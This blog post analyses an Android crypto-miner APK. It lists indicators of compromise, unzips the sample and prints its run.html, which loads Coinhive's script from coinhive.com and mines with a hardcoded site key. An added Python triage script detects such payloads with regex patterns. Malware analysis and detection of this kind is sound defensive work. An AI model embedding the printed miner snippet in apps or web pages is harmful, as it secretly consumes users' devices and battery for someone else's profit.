Fishing for Malware — Part Two: Android Crypto Miner

Published 2022-01-23
Edited 2023-10-25 (git:05b41b4)

Information

Indicators of Compromise

  • MD5: 8844985fcd57b0311d1d4cb2ec13a1ef
  • SHA-1: a0c07fe897515e5575a72f94f9dea8c077a410ff
  • SHA-256: 0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257
  • Package name: com.ufo.miner
  • Connected domain: coinhive.com
  • Unexpected high utilization of Android device resources

File

  • Magic: APK archive
  • Language: Java
  • Size: 45.43 KB

See this file on VirusTotal

As the heading and package name imply, this is a crypto miner developed for Android devices. However, that isn’t particularly interesting on its own, and 45.43 KB is small — suspiciously small — so let’s take a look inside the file.

Source

Extraction

$ unzip 0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257.raw.zip
Archive:  0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257.raw.zip
  inflating: META-INF/MANIFEST.MF
  inflating: META-INF/CERT.SF
  inflating: META-INF/CERT.RSA
 extracting: res/drawable-xhdpi-v4/ic_launcher.webp
  inflating: AndroidManifest.xml
 extracting: res/drawable-hdpi-v4/ic_launcher.webp
  inflating: res/layout/activity_main.xml
  inflating: assets/run.html
 extracting: resources.arsc
 extracting: res/drawable-mdpi-v4/ic_launcher.webp
  inflating: classes.dex
 extracting: res/drawable-xxhdpi-v4/ic_launcher.webp
  inflating: res/menu/main.xml

I see an HTML file, some WebP images, and some other files whose extensions I am not familiar with. Let's check them out.

$ cat assets/run.html
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.Anonymous('fwW95bBFO91OKUsz1VhlMEQwxmDBz7XE', {
        threads: 4,
        throttle: 0.8
    });
    miner.start();
</script>

Sigh. It remains boring. Two details are still worth noting. The 32-character string passed to CoinHive.Anonymous is not a crypto wallet but a Coinhive site key: Coinhive credited mined shares to the key and paid the account behind it in Monero, so no payout address ever appears in the script. And throttle: 0.8 tells each of the four threads to sit idle 80% of the time, presumably trading hash rate for a smaller footprint in the device's power report. By searching for the site key, I came across a presentation from Fortinet indicating that this Coinhive-related malware may have been part of the Trinity Android P2P malware bot, which is quite interesting. Alas, that is a rabbit hole for another blog post.

Each WebP image was a rescaled version of the stock Android logo, not much to say beyond that.
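The manual steps above (unzip the APK, read assets/run.html, recover the site key and mining options) boil down to a small triage script. This is an added example, not code from the post or from the sample itself. It assumes only the Python standard library; the APK it scans is constructed in memory, with the run.html payload taken from the post and every other entry a placeholder. Its cpu_budget figure makes the throttle point concrete: threads 4 with throttle 0.8 asks for roughly 0.8 of one core, not four cores.

```python
"""Offline triage of an APK for a bundled Coinhive-style browser miner.

Added example, not code from the original post or from the sample. It
automates the manual walkthrough (unzip, read assets/*.html, pull out the
Coinhive site key and mining options) so it can run over a batch of APKs.
The APK below is constructed in memory: run.html reproduces the one shown
in the post, every other entry is a placeholder.
"""
from __future__ import annotations

import hashlib
import io
import re
import zipfile
from dataclasses import dataclass, field

# Markers of the Coinhive browser-miner library. The site-key pattern covers
# both constructors the library offered, CoinHive.Anonymous and CoinHive.User.
COINHIVE_SCRIPT_RE = re.compile(r"coinhive\.com/lib/coinhive(?:\.min)?\.js", re.I)
SITE_KEY_RE = re.compile(
    r"""new\s+CoinHive\.(?:Anonymous|User)\s*\(\s*['"]([A-Za-z0-9]{16,64})['"]"""
)
OPTION_RE = re.compile(r"\b(threads|throttle)\s*:\s*([0-9.]+)")
WEB_SUFFIXES = (".html", ".htm", ".js")


@dataclass
class MinerFinding:
    entry: str
    site_key: str | None
    threads: int
    throttle: float

    @property
    def cpu_budget(self) -> float:
        """Cores the config asks for: threads * (1 - idle fraction).

        Coinhive's `throttle` is the fraction of time each thread idles, so
        threads=4, throttle=0.8 is about 0.8 of one core, not four cores.
        """
        return self.threads * (1.0 - self.throttle)


@dataclass
class TriageReport:
    sha256: str
    entries: list[str]
    findings: list[MinerFinding] = field(default_factory=list)

    @property
    def is_miner(self) -> bool:
        return bool(self.findings)


def triage_apk(data: bytes) -> TriageReport:
    """Hash the APK, list its entries and scan bundled web content for Coinhive."""
    report = TriageReport(sha256=hashlib.sha256(data).hexdigest(), entries=[])
    with zipfile.ZipFile(io.BytesIO(data)) as apk:
        for info in apk.infolist():
            report.entries.append(info.filename)
            if not info.filename.lower().endswith(WEB_SUFFIXES):
                continue
            text = apk.read(info).decode("utf-8", errors="replace")
            key = SITE_KEY_RE.search(text)
            if not (key or COINHIVE_SCRIPT_RE.search(text)):
                continue
            opts = dict(OPTION_RE.findall(text))
            report.findings.append(MinerFinding(
                entry=info.filename,
                site_key=key.group(1) if key else None,
                # 1 thread if unspecified (Coinhive itself defaulted to the core count)
                threads=int(float(opts.get("threads", 1))),
                throttle=float(opts.get("throttle", 0.0)),
            ))
    return report


# --- constructed sample: run.html as shown in the post, the rest placeholders --
RUN_HTML = b"""<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.Anonymous('fwW95bBFO91OKUsz1VhlMEQwxmDBz7XE', {
        threads: 4,
        throttle: 0.8
    });
    miner.start();
</script>
"""
BENIGN_HTML = b"<html><body><p>nothing to see here</p></body></html>\n"


def build_sample_apk(payload: bytes = RUN_HTML) -> bytes:
    """Minimal zip shaped like the sample's listing; non-HTML entries are stand-ins."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("META-INF/MANIFEST.MF", b"placeholder")
        z.writestr("AndroidManifest.xml", b"<placeholder/>")
        z.writestr("assets/run.html", payload)
        z.writestr("resources.arsc", b"placeholder")
        z.writestr("classes.dex", b"placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    rep = triage_apk(build_sample_apk())
    print("sha256:", rep.sha256)
    for fd in rep.findings:
        print(f"{fd.entry}: site key {fd.site_key}, threads={fd.threads}, "
              f"throttle={fd.throttle} (~{fd.cpu_budget:.1f} cores)")
```

Point triage_apk at the bytes of a real APK to get the same report; the site key is the pivot that led to the Fortinet presentation, so it is the field worth feeding into further searches.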

How I assume this malware works:

  1. The app renders assets/run.html in an embedded browser view (presumably an Android WebView) inside its own activity, which loads coinhive.min.js from coinhive.com in the background.

  2. The miner opens a WebSocket to Coinhive's pool proxy and receives Monero (CryptoNight) hashing jobs.

  3. The miner hashes at the configured thread count and throttle and submits found shares back to Coinhive, which credits them to the site key hardcoded into the script and pays the key's owner in Monero, minus its cut.

  4. The victim's phone gets too hot, or the battery drains too fast; upon seeing com.ufo.miner as the culprit in the device's power report, the victim promptly uninstalls the application.

Personal Thoughts

This is a very small application and doesn't perform any particularly special operations; in fact, I debated including it in this series at all. More interesting to me than the malware itself, however, is the platform it targets.

In the context of cryptocurrency mining, Android devices are not particularly powerful, and therefore not as lucrative as most other computing machines. Coinhive mined Monero, whose CryptoNight algorithm was designed to be CPU-friendly, which is the only reason a phone can contribute at all; for the more popular cryptocurrencies available today, such as Bitcoin, a phone's hash rate is negligible, and it would take a vast array of Android smartphones and tablets to generate even a moderate amount. This issue is exacerbated by the ease of detection: many users infected with this malware, I would reason, could trivially identify its existence via the power usage utility on their Android device, thereby shortening its runtime.

A humorous reference to Coinhive's coinhive.min.js script I found online: "Stack Overflow: [Coinhive header] automatically appears in my website"

And, finally, kudos to Troy Hunt, who took over the coinhive.com domain after the service closed in 2019 and repurposed it to warn the sites that still embed the script.

Thanks so much for reading!
